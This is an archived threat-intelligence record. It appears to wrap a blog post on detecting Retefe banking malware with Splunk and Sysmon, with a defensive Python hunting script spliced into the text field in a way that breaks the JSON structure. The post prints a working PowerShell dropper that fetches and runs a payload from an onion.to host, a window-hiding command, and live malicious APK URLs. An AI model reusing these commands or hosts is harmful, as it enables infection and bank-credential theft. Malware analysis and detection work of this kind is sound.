{
	"id": "afd2696e-d7fa-4da4-b6ae-bc11a75bf90e",
	"created_at": "2026-04-06T00:17:25.662816Z",
	"updated_at": "2026-04-10T03:21:10.134462Z",
	"deleted_at": null,
	"sha1_hash": "175ed924530bca2746364f93071c0ff09061cb6e",
	"title": "Hunting Retefe with Splunk - some interesting points",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 678786,
	"plain_text": "Hunting Retefe with Splunk - some interesting points\r\nArchived: 2026-04-05 21:22:30 UTC\r\nWhile I was creating some Splunk use cases to detect malware (together with Sysmon), I was doing some tests with the malware Retefe, which I have written about quite a bit in this blog.\r\nThere are a couple of things I found interesting to share.\r\nThe initial infection vector is malspam with a fake bill in a DOCX file which contains some malicious code. However, this time the malicious code is PowerShell instead of JS (more info in http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html).\r\nThis can be spotted straightforwardly in Splunk, since Sysmon logs the full command line of the spawned PowerShell process:\r\npowershell -EncodedCommand \"JABGAD0AJABlAG4AdgA6AFQAZQBtAHAAKwAnAFwAUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAJwA7ACgATg\r\nThe decoded command, which acts as a dropper, is the following (the base64 wraps UTF-16LE text, which is what -EncodedCommand expects, so it has to be decoded with that encoding rather than UTF-8):\r\n$F=$env:Temp+'\\RBXr1lk9P.js';\r\n(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.We\r\nBasically, it requests a file (the payload) hosted on a Tor hidden service through the onion.to Tor2web gateway: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=\r\nhttp://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html\r\nTo request the file, it is necessary to send the public IP of the victim and the volume serial number of the logical disk as parameters. To do so, two things happen:\r\n1) a request to http://api.ipify.org/ to obtain the public IP of the victim\r\n2) the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) to extract the serial number of the logical disk\r\nIf the IP is not from some specific countries, or the serial number is empty, the downloaded payload is empty as well, hence nothing happens. Actually, in some cases the index \"2\" doesn't work and needs to be different.
For example, this command will work in some virtual machines (just put an IP from Switzerland in place of w.x.y.z):\r\n$F=$env:Temp+'\\RBXr1lk9P.js';(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z\u0026id='+((wmic path win32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F)\r\nClearly, they are using the volume serial number for tracking purposes.\r\nOnce the script is pulled, the whole execution happens: some JS code is executed, some additional tools are decompressed and executed (Tor and Proxifier), the browser processes are killed, etc.\r\nHowever, a couple of new 'features' have been introduced since my last posts:\r\nhttp://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html\r\nhttp://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html\r\nFirst of all is the way the Proxifier tool is launched, as its window is now hidden. This is done with the following PowerShell command, which declares user32!ShowWindow through Add-Type and keeps calling it with SW_HIDE (0) against the Proxifier main window handle, looping until ShowWindow returns true, i.e. until the window has appeared and been hidden:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$t='[DllImport(\\\"user32.dll\\\")] public static extern bool ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \\\"Proxifier\\\";while(![n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\\\"proxifier\\\")|gps).MainWindowHandle,0)){}\"\r\nSecond, Proxifier is configured not to show its icon in the Windows system tray.\r\nAfter that, the victim's traffic towards the banks is redirected to Tor. In order to steal the SMS TAN token, it is necessary to install a malicious APK; however, here there are some changes as well:\r\nNow the APK resides on a domain with a valid SSL certificate and the APK can be downloaded over HTTPS.
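Before going on to the APK changes, here is how the hunting described so far (the encoded PowerShell dropper, its tells, and the hidden Proxifier launch) can be prototyped offline. This is an example added here, not code from the post: it decodes a -EncodedCommand argument the way powershell.exe does (base64 over UTF-16LE text, so a UTF-8 decode gives garbage), then scores constructed Sysmon process-creation events against the indicators the post points out. The event records, the onion.to hostname, the file name, the parent process names and the ipify DownloadString call in the sample dropper are all constructed stand-ins for this example; the decode and scoring logic is the part to reuse, for instance as a scripted lookup feeding the Splunk search over Sysmon EventCode=1.

```python
import base64
import binascii

DQ = chr(34)  # double-quote character, used when assembling the PowerShell samples
SQ = chr(39)  # single-quote character

# --- constructed samples, written for this example and not taken from the post ---
# Stand-in for the dropper: same shape as the one the post describes (WebClient
# download from an onion.to gateway, public IP looked up at ipify, volume serial
# number sent as an id, dropped file run via Shell.Application), placeholder host.
DROPPER = (
    '''$F=$env:Temp+'/sample.js';(New-Object System.Net.WebClient).DownloadFile('https://'''
    '''xxxxxxxxxxxxxxxx.onion.to/sample.js?ip='+(New-Object System.Net.WebClient)'''
    '''.DownloadString('http://api.ipify.org/')+'&id='+'''
    '''((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);'''
    '''(New-Object -com Shell.Application).ShellExecute($F)'''
)
# Stand-in for the hidden Proxifier launch: ShowWindow declared via Add-Type,
# then called with SW_HIDE (0) until the Proxifier window has been hidden.
HIDE_WINDOW = (
    '''$t='[DllImport(''' + DQ + 'user32.dll' + DQ + ''')] public static extern bool '''
    '''ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;'''
    '''saps -FilePath Proxifier;while(![n.w]::ShowWindow((gps proxifier).MainWindowHandle,0)){}'''
)
BENIGN = 'Get-Service | Where-Object Status -eq Running'  # harmless admin one-liner


def encode_command(script):
    '''Encode a script as powershell.exe -EncodedCommand expects: base64 of UTF-16LE.'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


# Constructed Sysmon Event ID 1 records reduced to the fields this hunt needs
# (field names follow the Sysmon schema; full image paths omitted for brevity).
EVENTS = [
    {'id': 'evt-1', 'ParentImage': 'WINWORD.EXE', 'Image': 'powershell.exe',
     'CommandLine': 'powershell -EncodedCommand ' + DQ + encode_command(DROPPER) + DQ},
    {'id': 'evt-2', 'ParentImage': 'wscript.exe', 'Image': 'powershell.exe',
     'CommandLine': 'powershell.exe ' + DQ + HIDE_WINDOW + DQ},
    {'id': 'evt-3', 'ParentImage': 'cmd.exe', 'Image': 'powershell.exe',
     'CommandLine': 'powershell.exe -NoProfile -ExecutionPolicy Bypass -enc ' + encode_command(BENIGN)},
]

ENCODED_FLAG = 'encodedcommand'


def decode_encoded_command(cmdline):
    '''Return the script carried by -EncodedCommand, or None if there is none.
    powershell.exe accepts any unambiguous prefix of the flag (-e, -ec, -enc, ...),
    with either - or / as the switch character.'''
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        tok = tokens[i]
        if tok[:1] not in ('-', '/'):
            continue
        flag = tok[1:].lower()
        if not flag or not ENCODED_FLAG.startswith(flag):
            continue
        b64 = tokens[i + 1].strip(DQ + SQ)
        b64 += '=' * (-len(b64) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(b64)
        except (binascii.Error, ValueError):
            return None
        return raw.decode('utf-16-le', errors='replace')
    return None


# Substrings that characterise the dropper and the hidden Proxifier launch,
# matched case-insensitively in the command line and in the decoded script.
INDICATORS = (
    ('system.net.webclient', 'remote download via System.Net.WebClient'),
    ('.onion.to', 'payload fetched from a Tor hidden service through a Tor2web gateway'),
    ('api.ipify.org', 'public IP lookup (the server geofences the payload)'),
    ('volumeserialnumber', 'volume serial number sent as a victim id'),
    ('shellexecute', 'dropped file launched through Shell.Application'),
    ('dllimport', 'Win32 API declared inline with Add-Type'),
    ('showwindow', 'window hidden with user32!ShowWindow'),
)
OFFICE_PARENTS = ('winword.exe', 'excel.exe', 'powerpnt.exe')  # assumed list


def hunt(event):
    '''Findings for one process-creation event; an empty list means nothing to see.'''
    findings = []
    if 'powershell' not in event.get('Image', '').lower():
        return findings
    if event.get('ParentImage', '').lower() in OFFICE_PARENTS:
        findings.append('PowerShell spawned by an Office application')
    cmdline = event.get('CommandLine', '')
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append('encoded command decoded')
    haystack = (cmdline + ' ' + (decoded or '')).lower()
    for needle, why in INDICATORS:
        if needle in haystack:
            findings.append(why)
    return findings


def triage(events):
    '''(event id, findings) for every event with findings, most suspicious first.'''
    hits = [(e['id'], hunt(e)) for e in events if hunt(e)]
    return sorted(hits, key=lambda h: -len(h[1]))


if __name__ == '__main__':
    for event_id, findings in triage(EVENTS):
        print(event_id, findings)
```

An encoded command on its own is weak evidence (evt-3 above is a harmless admin one-liner that only yields the decoded-command finding), so the set of findings, not the mere presence of -EncodedCommand, is what should drive the alert; the Office parent and the onion.to download are the strong signals, and the ShowWindow pattern catches the hidden Proxifier launch even though that command line is not encoded at all.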
Before this change, the APK was served over plain HTTP only.\r\nNote that the certificate was registered a few days ago and is valid for 2 months.\r\nMoreover, if the victim is not a real victim, the download link does not return the malicious APK but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected. Some examples of the URL for different banks:\r\nhttps://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk\r\nhttps://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk\r\nhttps://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk\r\nSource: http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html"
	],
	"report_names": [
		"hunting-retefe-with-splunk-some24.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434645,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.pdf",
		"text": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.txt",
		"img": "https://archive.orkl.eu/175ed924530bca2746364f93071c0ff09061cb6e.jpg"
	}
}